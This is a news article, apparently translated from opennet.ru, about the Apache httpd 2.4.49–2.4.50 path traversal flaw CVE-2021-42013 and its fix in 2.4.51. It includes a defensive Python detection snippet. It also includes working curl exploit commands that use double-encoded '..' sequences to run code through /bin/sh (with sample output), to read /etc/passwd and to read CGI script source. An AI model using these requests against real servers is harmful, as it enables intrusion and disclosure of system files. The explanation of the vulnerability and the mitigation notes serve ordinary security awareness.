New vulnerability in Apache httpd allowing access outside the site root directory

A new attack vector has been identified in the Apache http server that remained unfixed in update 2.4.50 and allows access to files in areas outside the site root directory. In addition, researchers have found a method that, in the presence of certain non-standard settings, allows not only reading system files but also remotely executing code on the server. The problem appears only in releases 2.4.49 and 2.4.50; earlier versions are not affected. Apache httpd 2.4.51 was released urgently to eliminate the new vulnerability.

In essence, the new problem (CVE-2021-42013) is completely analogous to the original vulnerability (CVE-2021-41773) in 2.4.49, the only difference being a different encoding of the ".." characters. Specifically, release 2.4.50 blocked the use of the "%2e" sequence to encode a dot, but missed the possibility of double encoding: when "%%32%65" is specified, the server decodes it to "%2e" and then to ".", i.e. the "../" characters for moving to the parent directory can be encoded as ".%%32%65/".
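The double-decoding behaviour described above is also the reason a single-pass check misses the bypass. The following Python is an added example (not code from the article or from the Apache project) that percent-decodes a request path repeatedly and reports the decoding round at which a ".." segment first appears; the sample paths are constructed for illustration:

```python
from urllib.parse import unquote
import re

# Constructed sample request paths modelled on the encodings discussed in the
# article (assumption: illustrative values, not captured traffic).
SAMPLE_PATHS = [
    "/cgi-bin/.%2e/.%2e/etc/passwd",          # single-encoded, blocked by 2.4.50
    "/cgi-bin/.%%32%65/.%%32%65/etc/passwd",  # double-encoded, the 2.4.50 bypass
    "/cgi-bin/test.cgi",                      # benign request
    "/images/..%2F..%2Fetc/passwd",           # encoded slash variant
]

def traversal_round(path, max_rounds=3):
    """Return the decoding round (0 = raw path, 1 = after one percent-decode,
    ...) at which a bare '..' path segment first appears, or 0 if none appears
    before the path stops changing or max_rounds is reached."""
    current = path
    for rnd in range(0, max_rounds + 1):
        if rnd > 0:
            decoded = unquote(current)
            if decoded == current:   # no percent-escapes left to resolve
                return 0
            current = decoded
        # Split on both slash styles so '..' is matched only as a whole segment.
        if ".." in re.split(r"[/\\]", current):
            return rnd
    return 0

def classify(paths, max_rounds=3):
    """Map each path to the round that exposes '..' (0 means clean)."""
    return {p: traversal_round(p, max_rounds) for p in paths}

if __name__ == "__main__":
    for p, rnd in classify(SAMPLE_PATHS).items():
        verdict = "clean" if rnd == 0 else f"traversal after {rnd} decode(s)"
        print(f"{p:45} {verdict}")
```

A check that decodes only once reports the first path but not the second; iterating until the path stops changing catches both.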

As for exploiting the vulnerability for code execution, this is possible when mod_cgi is enabled and a base path is used in which execution of CGI scripts is allowed (for example, if the ScriptAlias directive is enabled or the ExecCGI flag is specified in the Options directive). A mandatory requirement for a successful attack is also that the Apache configuration explicitly grants access to directories containing executable files, such as /bin, or access to the file system root "/". Since such access is not normally granted, the code execution attack is of little practical use on real systems.

At the same time, the attack to obtain the contents of arbitrary system files and the source text of web scripts that are readable by the user under which the http server runs remains relevant. To carry out such an attack, it is enough for the site to have a directory configured using the "Alias" or "ScriptAlias" directives (DocumentRoot is not sufficient), such as "cgi-bin".

Example exploit that allows running the "id" utility on the server:

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Example exploits that allow displaying the contents of /etc/passwd and one of the web scripts (to output the script code, a directory defined via the "Alias" directive, for which script execution is not enabled, must be specified as the base directory):

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

curl 'http://192.168.0.1/aliaseddir/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/usr/local/apache2/cgi-bin/test.cgi'

The problem mainly affects continuously updated distributions such as Fedora, Arch Linux and Gentoo, as well as FreeBSD ports. Packages in the stable branches of the conservative server distributions Debian, RHEL, Ubuntu and SUSE are not affected by the vulnerability. The problem does not occur if access to directories is explicitly denied using the "require all denied" setting.

Source: opennet.ru
